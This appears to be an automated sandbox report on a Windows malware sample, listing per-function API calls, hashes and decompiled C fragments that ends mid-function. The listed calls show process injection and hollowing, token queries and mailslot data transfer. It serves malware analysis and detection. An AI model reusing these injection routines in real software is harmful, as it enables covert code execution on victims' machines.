    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 66839

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:B58623B61A3D254FB9FF47FF0A4A74C6
Total matches:32
Initial Analysis Report:Open
Initial sample Analysis ID:66839
Initial sample SHA 256:20CE262F54448C1424662B74706D81FAB421EB8F550C39A18CDB89DD9F15CB07
Initial sample name:Bad.exe

Similar Executed Functions

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
